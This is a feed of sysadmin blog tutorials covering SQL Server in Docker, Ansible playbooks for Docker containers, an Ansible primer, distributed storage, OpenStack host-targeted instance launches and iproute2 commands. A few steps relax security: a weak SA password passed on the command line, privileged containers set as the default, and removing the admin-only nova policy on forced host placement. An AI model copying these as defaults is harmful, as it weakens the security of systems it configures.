install mssql-tools </code></pre> <p>on Ubuntu</p> <pre><code>~# curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - ~# wget https://packages.microsoft.com/config/ubuntu/16.04/prod.list -O /etc/apt/sources.list.d/msprod.list ~# apt-get update ~# apt-get install mssql-tools </code></pre> <p><strong>Query SQL Server</strong></p> <p>This Docker Image was created with SA password as <code>'RedHat123'</code>. You can change it later on.</p> <pre><code>[root@centos ~]# sqlcmd -S localhost -U SA -P 'RedHat123' 1&gt; SELECT Name from sys.Databases; 2&gt; GO Name -------------------------------------------------------------------------------------------------------------------------------- master tempdb model msdb (4 rows affected) 1&gt; </code></pre> <p>Create Database</p> <pre><code>1&gt; CREATE DATABASE test; 2&gt; GO </code></pre> <p>Use Database test</p> <pre><code>1&gt; USE test; 2&gt; GO Changed database context to 'test'. 1&gt; </code></pre> <p>Create Table </p> <pre><code>1&gt; CREATE TABLE student (id INT, name NVARCHAR(50), rollno INT); 2&gt; GO 1&gt; </code></pre> <p>Insert Some Data</p> <pre><code>1&gt; INSERT INTO student VALUES (1, 'joey', 1123); 2&gt; INSERT INTO student VALUES (2, 'phoebe', 1154); 3&gt; GO (1 rows affected) (1 rows affected) 1&gt; </code></pre> <p>Finally get it back</p> <pre><code>1&gt; SELECT * FROM student; 2&gt; GO id name rollno ----------- -------------------------------------------------- ----------- 1 joey 1123 2 phoebe 1154 (2 rows affected) 1&gt; </code></pre> <p><strong>Other tools that run on Windows to connect to this SQL Server Docker container:</strong></p> <ul> <li>SQL Server Management Studio (SSMS)</li> <li>Windows PowerShell</li> <li>SQL Server Data Tools (SSDT)</li> </ul> <p><strong><em>Thats it for now, Enjoy :)</em></strong></p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Creating Docker Container using Ansible<p><img src="http://www.googlinux.com/content/images/2016/12/ansible_docker_blog.png" alt=""> <strong><em>Ansible and Docker have acquired a larger share among DevOps products &amp; tools. So how about creating a generic ansible playbook to deploy a docker container.</em></strong></p> <blockquote> <p>If you are new to Ansible, I would recommend you to go through <a href="http://googlinux.com/ansible-getting-started/">Ansible: Getting Started</a>. </p> </blockquote> <p>We start our playbook by giving it a</p>http://www.googlinux.com/creating-docker-container-using-ansible/43f3cbc2-60b9-4a59-b014-6a0ae14d6b26DevOpsAnsibleDockerSwapnil JainSun, 18 Dec 2016 14:50:27 GMT<p><img src="http://www.googlinux.com/content/images/2016/12/ansible_docker_blog.png" alt=""> <strong><em>Ansible and Docker have acquired a larger share among DevOps products &amp; tools. So how about creating a generic ansible playbook to deploy a docker container.</em></strong></p> <blockquote> <p>If you are new to Ansible, I would recommend you to go through <a href="http://googlinux.com/ansible-getting-started/">Ansible: Getting Started</a>. </p> </blockquote> <p>We start our playbook by giving it a name <code>Create Docker Container</code>. This playbook will be executed on host <code>localhost</code> with connection type as local using user root. Make changes as per your need.</p> <pre><code>--- - name: Create Docker Container hosts: localhost connection: local remote_user: root </code></pre> <p>Start with our tasks. First one is to include our variables. This will make this playbook more generic.</p> <pre><code>tasks: - name: include variables include_vars: vars.yml </code></pre> <p>Lets have a look at the <code>vars.yml</code> file</p> <pre><code>image: swapnillinux/apache-php name: myweb src_port: 8080 dest_port: 80 src_vol: /mnt/www dest_vol: /var/www/html privileged: true </code></pre> <p>In this example I am creating a docker container with the following properties. And to make it generic have defined it as a variable in vars.yml file. Suit yourself, make changes as per your need.</p> <ul> <li><code>swapnillinux/apache-php</code> docker images will be used, which is based on CentOS+Apache2+PHP5+mod_ssl</li> <li>name of the container will be <code>myweb</code></li> <li>port <code>8080</code> from host running the container will be forwarded to port <code>80</code> of container.</li> <li>port <code>443</code> from host running the container will be forwarded to port <code>443</code> of container.</li> <li>folder <code>/mnt/www</code> from the host will be mapped as <code>/var/www/html</code> in the container. This will make you web-root persistent.</li> </ul> <p>Next task will install python-docker to support docker modules available with Ansible 2.2</p> <pre><code> - name: Install python-docker on Red Hat based distribution yum: name: python-docker enablerepo: extras state: latest when: ansible_os_family == 'RedHat' - name: Install python-docker on Debian based distribution apt: name: python-docker update_cache: yes when: ansible_os_family == 'Debian' </code></pre> <p>I am using <code>docker_container</code> module to create container. And using the variable defined in the <code>vars.yml</code> file </p> <pre><code> - name: Create Container docker_container: name: "{{ name }}" image: "{{ image }}" ports: - "{{ src_port }}:{{ dest_port }}" volumes: - "{{ src_vol }}:{{ dest_vol }}" privileged: "{{ privileged }}" </code></pre> <p>Theres a lot that can be done with <code>docker_container</code> module. Have a look at some great example by running the below command</p> <pre><code>ansible-doc docker_container </code></pre> <p>Thats not it, how about creating a systemd service and starting our container with system boot. For this I have used Jinja2 templates.</p> <p>This is a jinja2 systemd unit file template. </p> <pre><code># cat systemd.j2 [Unit] Description={{ name }} Docker Container Requires=docker.service After=docker.service [Service] Restart=always ExecStart=/usr/bin/docker start -a {{ name }} ExecStop=/usr/bin/docker stop -t 2 {{ name }} [Install] WantedBy=default.target </code></pre> <p>We use <code>template</code> module in ansible to create this unit file using the name variable defined in <code>vars.yml</code></p> <pre><code> - name: Create Systemd Unit File as docker-{{ name }}.service template: src=systemd.j2 dest=/etc/systemd/system/docker-{{ name }}.service - name: reload systemd daemon command: systemctl daemon-reload </code></pre> <p>Next task will enable this service and start it, which should also start our container.</p> <pre><code> - name: Start &amp; Enable docker-{{ name }} service service: name: docker-{{ name }} state: started enabled: yes </code></pre> <p>And finally print the <code>docker ps</code> output</p> <pre><code> - name: check container status command: docker ps register: result - debug: var=result.stdout </code></pre> <blockquote> <p>Ansible playbooks are created in yaml which are very sensitive to spaces and indentation. Copy paste in this blog might have destroyed that. So I have made all files available on GitHub at <a href="https://github.com/swapnil-linux/ansible/tree/master/create-docker-container">https://github.com/swapnil-linux/ansible/tree/master/create-docker-container</a> </p> </blockquote> <p>now lets execute this</p> <p><img src="http://www.googlinux.com/content/images/2016/12/Screenshot-2016-12-18-20-17-03.png" alt=""></p> <p>Thats it for now. Enjoy ansibling :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Ansible: Getting Started<h3 id="whatisansible">What is Ansible?</h3> <p>Ansible was originally written by Michael DeHaan in Python with its first release on February 20, 2012. It was later acquired by Red Hat. Ansible is an open source configuration management and orchestration utility. It helps to automate deployment or softwares and configurations of multiple remote hosts.</p>http://www.googlinux.com/ansible-getting-started/f68c66cd-eb76-403c-863b-a65fea9d7341AnsibleDevOpsSwapnil JainTue, 04 Oct 2016 17:40:42 GMT<h3 id="whatisansible">What is Ansible?</h3> <img src="http://www.googlinux.com/content/images/2016/10/marshmellow.jpg" alt="Ansible: Getting Started"><p>Ansible was originally written by Michael DeHaan in Python with its first release on February 20, 2012. It was later acquired by Red Hat. Ansible is an open source configuration management and orchestration utility. It helps to automate deployment or softwares and configurations of multiple remote hosts. Instead of writing custom, unmanaged, long and individual bash scripts, system administrators can write playbooks in Ansible. Ansible is also supported by DevOps tools, such as Vagrant and Jenkins.</p> <ul> <li><code>Playbook</code> is a YAML (<strong>Y</strong>AML <strong>A</strong>in't <strong>M</strong>arkup <strong>L</strong>anguage) file which consists a list of <code>Plays</code>. </li> <li>A <code>Play</code> in a playbook is a list of <code>Tasks</code>.</li> <li>A <code>Task</code> in a play contains <code>Modules</code> and its arguments.</li> <li>Where as <code>Module</code> are the ones that do the actual work in ansible.</li> </ul> <h3 id="howansibleworks">How Ansible Works?</h3> <p>The greatest benefit of Ansible that I see is, unlike Puppet it is agent less. The only requirement on remote host (know as <mark>Managed Host</mark>) is Python 2.4 or later. If you are running less than Python 2.5 on the remotes, you will also need <code>python-simplejson.</code> Ansible is installed on a central host (know as <mark>Control Host</mark>) where Playbooks are created. Playbooks are pushed to Managed Host thru SSH as a Python code and executed locally on Managed Host.</p> <h3 id="installingansible">Installing Ansible</h3> <p>Ansible needs to be installed on control node. As of now control node is not supported on Windows. It is available via Yum(Red Hat), Apt (Debian), Portage (Gentoo), pkg (FreeBSD), OpenCSW (Solaris), Pacman (Arch Linux), Pip and can be installed from Source as well. Python 2.6 or 2.7 is required on Control Node. Python3 not yet supported just like many other Python apps :).</p> <h4 id="redhatbaseddistributions">Red Hat based Distributions</h4> <p>Ansible on Red Hat based distributions like RHEL, CentOS, Fedora is available through EPEL repo.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-21-35-39.png" alt="Ansible: Getting Started"></p> <h4 id="debianbaseddistributions">Debian Based Distributions</h4> <pre><code>[root@debian ~]# apt-get update [root@debian ~]# apt-get install -y ansible </code></pre> <h3 id="testingyourinstallation">Testing Your Installation</h3> <pre><code>[root@centos ~]# ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides [root@centos ~]# ansible localhost -m ping --connection=local localhost | SUCCESS =&gt; { "changed": false, "ping": "pong" } [root@centos ~]# </code></pre> <p><code>ansible --version</code> displays the ansible version and the ansible configuration file its referring to. <code>ansible localhost -m ping --connection=local</code> will run a ansible module <code>ping</code> on <code>localhost</code> using connection as <code>local</code> instead of <code>ssh</code> which is default. Receiving a <code>SUCCESS</code> and a <code>"pong"</code> in reply says that ansible was able to connect to localhost successfully. We will discuss more about modules later.</p> <h3 id="ansibleconfiguration">Ansible Configuration</h3> <p>Default ansible configuration file is located as <code>/etc/ansible/ansible.cfg</code>. If ansible finds a <code>.ansible.cfg</code> in users home directory, options in that config file will override the one in default config file.</p> <pre><code>[root@centos ~]# ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides [root@centos ~]# touch ~/.ansible.cfg [root@centos ~]# ansible --version ansible 2.1.1.0 config file = /root/.ansible.cfg configured module search path = Default w/o overrides [root@centos ~]# </code></pre> <p>If ansible finds <code>ansible.cfg</code> file in your current working directory, option within that file will take precedence over the above two. Below example shows that. </p> <pre><code>[root@centos ~]# mkdir Test [root@centos ~]# cd Test [root@centos Test]# touch ansible.cfg [root@centos Test]# ansible --version ansible 2.1.1.0 config file = /root/Test/ansible.cfg configured module search path = Default w/o overrides [root@centos Test]# </code></pre> <p>Or, if you have your config file at some other location and want ansible to point to it, <code>$ANSIBLE_CONFIG</code> bash environment variable will help you do that. And that takes precedence over all others.</p> <pre><code>[root@centos Test]# touch /var/tmp/myansible.cfg [root@centos Test]# export ANSIBLE_CONFIG=/var/tmp/myansible.cfg [root@centos Test]# ansible --version ansible 2.1.1.0 config file = /var/tmp/myansible.cfg configured module search path = Default w/o overrides [root@centos Test]# </code></pre> <h3 id="inventory">Inventory</h3> <p>If Ansible modules are the tools in your workshop, playbooks are your instruction manuals, and your <strong>inventory</strong> of hosts are your raw material.</p> <p>Ansible’s inventory file is a list of your managed hosts. It can contain hostnames, ipaddresses, hostpaterns using regular expressions. It also contains groups of hosts and group of groups. Default inventory location is <code>/etc/ansible/hosts</code>. You can specify a different inventory file using the <code>-i &lt;path&gt;</code> option on the command line. Inventory file can also contain host and group variables which can later be used in playbooks.</p> <h3 id="modules">Modules</h3> <p>Ansible ships with a hundreds of modules that can be executed directly on remote hosts using ad-hoc commands or through Playbooks.</p> <p>You can also write your own modules. These modules can control system resources, like services, packages, or files (almost anything that you would like to manage), or handle executing system commands.</p> <p><code>ansible-doc -l</code> would give you a list of all modules with a short description piped to less.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-22-31-24.png" alt="Ansible: Getting Started"></p> <p><code>ansible-doc &lt;module_name&gt;</code> will show detailed information about the usage of module, including snippets and some examples which can be used in playbooks and ad-hoc commands.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-22-33-03.png" alt="Ansible: Getting Started"></p> <h3 id="runningadhoccommands">Running Ad-Hoc Commands</h3> <p>True power of Ansible lies in playbooks. Why would you use ad-hoc tasks versus playbooks? Ad-hoc command is a quick way executing your modules on remote hosts without saving them for later use. For example, if you want to poweroff all or a group of servers on weekend.</p> <p><code>ansible &lt;HOST-PATTERN&gt; -m &lt;MODULE_NAME&gt; -a &lt;MODULE_ARGS&gt;</code></p> <pre><code>[root@centos ~]# ansible all -m command -a "/usr/sbin/poweroff" -i myinventory </code></pre> <p>Some more examples will help you understand power of ad-hoc commands</p> <p><strong>Will execute <code>hostname</code> command on all hosts in your inventory</strong></p> <pre><code>[root@centos ~]# ansible all -m command -a hostname localhost | SUCCESS | rc=0 &gt;&gt; centos 192.168.56.1 | SUCCESS | rc=0 &gt;&gt; Swapnils-MacBook-Pro.local </code></pre> <p><strong>Using YUM module, will install the latest version of docker on host named centos, if already install will make sure its latest.</strong></p> <pre><code>[root@centos ~]# ansible centos -m yum -a 'name=docker state=latest' centos | SUCCESS =&gt; { "changed": false, "msg": "", "rc": 0, "results": [ "All packages providing docker are up to date", "" ] } </code></pre> <p><strong>Using service module, will started docker service and also enable it to start on system boot</strong></p> <pre><code>[root@centos ~]# ansible centos -m service -a 'name=docker state=started enabled=yes' centos | SUCCESS =&gt; { "changed": true, "enabled": true, "name": "docker", "state": "started" } </code></pre> <h3 id="letsputitinaplaybook">Lets put it in a Playbook</h3> <p>We use this modules to create 2 tasks in a play. So, our playbook looks like below.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-23-03-27.png" alt="Ansible: Getting Started"></p> <h5 id="letsexecuteit">Lets execute it.</h5> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-23-06-02.png" alt="Ansible: Getting Started"></p> <blockquote> <p><strong><em>Please note</em></strong>, <em>ansible playbooks are written as YAML, and YAML is very sensitive to spaces and indentation. Do not use tabs. putting the below line in your <code>~/.vimrc</code> will help.</em></p> </blockquote> <pre><code>set nu set ai set softtabstop=2 set expandtab </code></pre> <p>Thats it for now. Next, I will go deeper into playbooks. Till then enjoy ansibling :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Understanding Distributed Data Storage<p><em>With the advent of 21st century, we entered a digital world, people have started using technology in every aspect of life, adopting it more and more to make life easier and save time. With this increased use, the demand to store and preserve the user data has also increased manifold.</em></p>http://www.googlinux.com/understanding-distributed-data-storage/4ea60e1e-dc13-4a6d-8dcc-03f5bd72a93dCephGlusterDaleep Singh BaisMon, 03 Oct 2016 13:13:09 GMT<p><em>With the advent of 21st century, we entered a digital world, people have started using technology in every aspect of life, adopting it more and more to make life easier and save time. With this increased use, the demand to store and preserve the user data has also increased manifold. You use cameras to take pics and to treasure these memories, upload them to web enabled storage like Picassa etc. Just imagine, Picasa has about 7 billion photos uploaded to it, which is little more than Flickr, less than Photobucket, and just a tiny fraction of Facebook. This figure might help you to imagine the kind of data store these companies might be using.</em></p> <p><img src="http://www.googlinux.com/content/images/2016/10/2011-dropboxetc.jpeg" alt=""></p> <p>With data requirement as such, local storage solutions will not be able to keep at par with the continuous increase in demand. We can say that we have reached the stage at which traditional way of storing data using stand-alone network attached device no longer serves the purpose. </p> <p>As per a report published by IDC, "This is the digital universe. It is growing 40% a year into the next decade, expanding to include not only the increasing number of people and enterprises doing everything online, but also all the “things” – smart devices – connected to the Internet, unleashing a new wave of opportunities for businesses and people around the world. Like the physical universe, the digital universe is large – by 2020 containing nearly as many digital bits as there are stars in the universe. It is doubling in size every two years, and by 2020 the digital universe – the data we create and copy annually – will reach 44 zettabytes, or 44 trillion gigabytes."</p> <p><img src="http://www.googlinux.com/content/images/2016/10/du-stacks-to-moon.jpg" alt=""></p> <p>The answer to this doesn't lie in have faster, bigger drives or higher bandwidth data networks, it lies in a new concept of storing data, which is Distributed Data Storage.</p> <p>Data storage solutions have evolved now to accommodate this ever growing need for flexible and scalable storage resource.</p> <h2 id="sowhatisdistributeddatastorage">So what is Distributed Data Storage?</h2> <p>To quote <strong><em>Wikipedia</em></strong>, "A distributed data store is a computer network where information is stored on more than one node, often in a replicated fashion. It is usually specifically used to refer to either a distributed database where users store information on a number of nodes, or a computer network in which users store information on a number of peer network nodes."</p> <p>Using Distributed Data Storage , you can deliver any of the 3 types of storage, may it be block, file or object. </p> <h3 id="howisdistributeddatastoragedifferentfromtraditionalwayofstoringdata">How is Distributed Data Storage different from traditional way of storing data?</h3> <p>Understanding the difference between these two ways of storing data lies in getting to know the salient features and approach to the solution.</p> <p>Traditional storage is mostly hardware defined and dependent on traditional SAN &amp; NAS storage systems, whereas, Distributed Data Storage has given a new meaning to Software Defined Storage. </p> <h4 id="cost">Cost -</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/cost-reduction-projects1-e1371369693372.jpg" alt=""></p> <p>Due to this very reason of traditional storage being hardware defined, cost plays a major role in making the decision. With traditional SAN &amp; NAS storage array, you shell out a huge amount to procure and deploy the hardware, whereas, with SDS, you can simply start the storage cluster using commodity of the shelf hardware, it uses standard servers, drives and network. You don't any specialized hardware for deploying Distributed Data Storage . With Distributed Data Storage , you can minimize the cost of the infrastructure, which can be significant considering the continuous growth in demand of storage need. It combines storage and compute, hence, making full use of the servers. and consuming less power, cooling, space, etc. </p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-11-47-31.png" alt=""></p> <p>Nowadays, such storage solutions are also available on ARM platforms, making it for useful for storage solutions. <a href="http://ambedded.com.tw">Ambedded Technology</a>, winner of InterOp2016 is the first company who has pioneered in this direction.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-12-28-18.png" alt=""></p> <h4 id="scalablecapacityperformance">Scalable ( capacity &amp; performance ) -</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/scal3.png" alt=""></p> <p>Traditional SAN / NAS can be scaled up to a limit, maximum number of controllers it can support or maximum number of drives one can connect to each controller. This defines the real limit for these devices, whereas, with SDS / Distributed Data Storage , there is virtually no limit for expanding the capacity. It is by design, a cloud. You keep on adding new nodes to it and your cluster keeps on increasing. Maintenance is also comparatively easy for these as you can add a new node and remove the faulty from cluster. </p> <h4 id="flexibility">Flexibility -</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/boing-e8e8e81.png" alt=""></p> <p>You can add / remove nodes from data storage cluster on the fly. You don't need any downtime for maintenance on this solution. Managing it is also easy, you can mostly manage it using CLI commands or use REST APIs.</p> <h4 id="reliabilityresilience">Reliability / Resilience -</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/reliable.jpg" alt=""></p> <p>Most of the distributed Storage solutions take care of its fault-tolerance by design. They also have capability to replicate the data stored for any un-foreseen event. Due to its distributed nature, the data is not stored on the same node and is distributed among various nodes of the cluster and each node is further replicated, depending on number of replicas defined by Cluster admin. Almost all of them also have data sanity check so that data stored is also checked for any corruption. </p> <p>In Distributed data storage,it is the function of Software Defined Storage system to ensure that everything is divided, distributed, replicated and in-case of any issue, rectified with intelligent algorithm created by admins.</p> <h4 id="opensourcenovendorlockin">OpenSource, No Vendor lockin –</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-12-48-01.png" alt=""></p> <p>With hardware NAS / SAN devices, you mostly need to go ahead with the existing solutions deployed and get the same hardware every-time you wish to increase the storage capacity. As distributed storage systems or for that case, Software Defined storage systems, are deployed /installed on commodity hardware, we are not bound with any particular hardware or server.</p> <h4 id="multitenancy">Multi-tenancy -</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/multitenancy.jpg" alt=""></p> <p>Software defined storage solutions are designed keeping cloud workload in mind, hence, multiple tenant support is built in it. They provide ability to isolate different tenants data and restrict access.</p> <h2 id="factsandfigures">Facts and figures</h2> <p><img src="http://www.googlinux.com/content/images/2016/10/xagxksez.jpeg" alt=""></p> <p>The global cloud storage market is expected to grow from USD 18.87 Billion in 2015 to USD 65.41 Billion by 2020, at a Compound Annual Growth Rate (CAGR) of 28.2% during the forecast period.</p> <p>The demand for this market is also being driven by big data and increasing adoption of cloud storage gateway. In 2015, North America is estimated to be the top contributor in the cloud storage market due to increasing technological acceptance and high awareness about emerging data storage concerns in the organization. However, APAC and some countries in MEA are expected to show tremendous growth in this market.</p> <p>The cloud storage market is broadly segmented by type: solutions and services; by solution: primary storage solution, backup storage solution, cloud storage gateway solution, and data movement and access solution; by service: consulting services, system and networking integration, and support training and education; by deployment model: public, private, and hybrid; by organizational size into SMBs and large enterprises; by vertical: BFSI, manufacturing, retail and consumer goods, telecommunication and IT, media and entertainment, government, healthcare and life sciences, energy and utilities, research and education, and others; and by region: North America, Europe, APAC, Latin America, and MEA.</p> <p>Cloud storage growth dominates projections for 2016 digital storage. According to Scality’s Jerome Lecat, “By the end of 2016, 80% of SMBs will host some or most of their business in the cloud. Because of this, the service providers that provide the cloud-services to such businesses will need new infrastructure to meet the increasing demand, and support its customers.”</p> <p>According to Mario Blandini from SwiftStack, “Ubiquitous access with cloud APIs for all unstructured data will represent the lion’s share of unstructured data stored. Optimal storage solutions will be those that can store and return the same data based on authentication rules no matter the access method. In via file, out via object, or vice versa.”</p> <blockquote> <p>Ceph, Swift, Gluster are some of the well known Software defined solutions for a fantastic distributed data storage solutions. </p> </blockquote> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-12-55-04.png" alt=""></p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-03-18-37-59.png" alt=""></p> <p><strong>This brings us to the end of this document, hope this has helped you to understand the difference between traditional storage and distributed data storage design.</strong></p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>OpenStack: Launching an instance on a specific compute host<p><strong><em>OpenStack takes care of Instance scheduling automatically for us depending on flavour selected during Nova instance boot, however, many times, we might need to populate the instance on a specific hypervisor / Nova compute node.</em></strong></p> <p>To achieve this we need to specify the compute node at the stage, you select Flavour,</p>http://www.googlinux.com/openstack-launching-an-instance-on-a-specific-compute-host/5fcf00bf-c4e3-4e9f-8154-5bcb513df035OpenStackCloud ComputingDaleep Singh BaisFri, 02 Sep 2016 02:42:47 GMT<img src="http://www.googlinux.com/content/images/2016/09/fiwaremexicoworkshop.jpg" alt="OpenStack: Launching an instance on a specific compute host"><p><strong><em>OpenStack takes care of Instance scheduling automatically for us depending on flavour selected during Nova instance boot, however, many times, we might need to populate the instance on a specific hypervisor / Nova compute node.</em></strong></p> <p>To achieve this we need to specify the compute node at the stage, you select Flavour, Image etc.</p> <h6 id="firststepwouldbetofindoutthenovaavailabilityzone">First step would be to find out the nova availability-zone.</h6> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-41-15.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <h6 id="nextlistthehypervisorsinyouropenstackcluster">Next, List the hypervisors in your OpenStack cluster.</h6> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-45-09.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <p><mark>For example</mark>, we wish to launch an Instance, specifically to host <code>server-osp2.example.com.</code></p> <p>Source to the user managing the particular tenant and run command -</p> <pre><code># nova boot --nic net-id=8df4cd26-9fb2-445a-a0ed-f5f7ffce5ade --flavor m1.tiny --image web Web-inst-osp2 --availability-zone nova:server-osp2.example.com </code></pre> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-47-58.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <blockquote> <p>Option <code>–availability-zone</code> takes nova availability zone along with Compute hostname on which the instance is to be populated.</p> </blockquote> <p>In this case, as we are trying with a non-admin user and so we get error message. This is a privileged operation by default and is allowed only by admin user. This prevents OpenStack users from hosting a compute host by scheduling all of their resources there. </p> <p>If this command still needs to be run as a regular user, we need to edit Nova policy, which imposes this restriction.</p> <p>Edit <code>/etc/nova/policy.json</code> file and change</p> <pre><code>"compute:create:forced_host": "is_admin:True", </code></pre> <p>to</p> <pre><code>"compute:create:forced_host": "", </code></pre> <p>and restart OpenStack Nova Service.</p> <p>Now you should be able to run the command successfully and see the instance up and running.</p> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-52-31.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <p>Run the below mentioned command to check on which hypervisor / Compute node, the instance is running </p> <pre><code># nova hypervisor-servers server-osp2.example.com </code></pre> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-53-33.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <p>Happy Cloud Computing :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>IP command from IPROUTE2<blockquote> <p><em><code>ip</code> command in Linux is used to show / manipulate routing, devices, policy routing and tunnels. It is a provided by <code>iproute2</code> package. <code>ifconfig</code> command which is provided by <code>net-tools</code> package has been around since long and will stay around. <code>ip</code> is more powerful and modern and will eventually replace it.</em></p></blockquote>http://www.googlinux.com/ip-command-from-iproute/59584986-3937-4f3d-b84a-d373f328c3d2LinuxSwapnil JainFri, 26 Aug 2016 04:00:00 GMT<blockquote> <img src="http://www.googlinux.com/content/images/2016/08/ip-address-900x300.jpg" alt="IP command from IPROUTE2"><p><em><code>ip</code> command in Linux is used to show / manipulate routing, devices, policy routing and tunnels. It is a provided by <code>iproute2</code> package. <code>ifconfig</code> command which is provided by <code>net-tools</code> package has been around since long and will stay around. <code>ip</code> is more powerful and modern and will eventually replace it. This blog shows some example and powerful use of <code>ip</code> command</em></p> </blockquote> <h1 id="ipqueries">IP QUERIES</h1> <h4 id="displayipaddressesandpropertyinformation">Display IP Addresses and property information</h4> <p>Show information for all addresses </p> <pre><code>root@bcf62d10644f:~# ip addr 1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff inet 172.17.0.3/16 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::42:acff:fe11:3/64 scope link valid_lft forever preferred_lft forever </code></pre> <p>Display information only for device eth0 </p> <pre><code>root@bcf62d10644f:~# ip addr show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff inet 172.17.0.3/16 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::42:acff:fe11:3/64 scope link valid_lft forever preferred_lft forever </code></pre> <h4 id="manageanddisplaythestateofallnetworkinterfaces">Manage and display the state of all network interfaces</h4> <p>Show information for all interfaces </p> <pre><code>root@bcf62d10644f:~# ip link 1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff </code></pre> <p>Display information only for device eth0 </p> <pre><code>root@bcf62d10644f:~# ip link show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff </code></pre> <p>Display interface statistics </p> <pre><code>root@bcf62d10644f:~# ip -s link 1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 RX: bytes packets errors dropped overrun mcast 0 0 0 0 0 0 TX: bytes packets errors dropped carrier collsns 0 0 0 0 0 0 2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff RX: bytes packets errors dropped overrun mcast 648 8 0 0 0 0 TX: bytes packets errors dropped carrier collsns 648 8 0 0 0 0 </code></pre> <h4 id="displayandaltertheroutingtable">Display and alter the routing table</h4> <p>List all of the route entries in the kernel </p> <pre><code>root@bcf62d10644f:~# ip route default via 172.17.0.1 dev eth0 172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.3 </code></pre> <h4 id="manageanddisplaymulticastipaddresses">Manage and display multicast IP addresses</h4> <p>Display multicast information for all devices </p> <pre><code>root@bcf62d10644f:~# ip maddr 1: lo inet 224.0.0.1 inet6 ff02::1 inet6 ff01::1 2: eth0 link 33:33:00:00:00:01 link 01:00:5e:00:00:01 link 33:33:ff:11:00:03 inet 224.0.0.1 inet6 ff02::1:ff11:3 inet6 ff02::1 inet6 ff01::1 </code></pre> <p>Display multicast information for device eth0 </p> <pre><code>ip maddr show dev eth0 </code></pre> <h4 id="showneighbourobjectsalsoknownasthearptableforipv4">Show neighbour objects; also known as the ARP table for IPv4</h4> <p>Display neighbour objects </p> <pre><code>ip neigh </code></pre> <p>Show the ARP cache for device em1 </p> <pre><code>ip neigh show dev em1 </code></pre> <h1 id="modifyingaddressandlinkproperties">MODIFYING ADDRESS AND LINK PROPERTIES</h1> <h4 id="addanaddress">Add an address</h4> <p>Add address 192.168.1.1 with netmask 24 to device em1 </p> <pre><code>ip 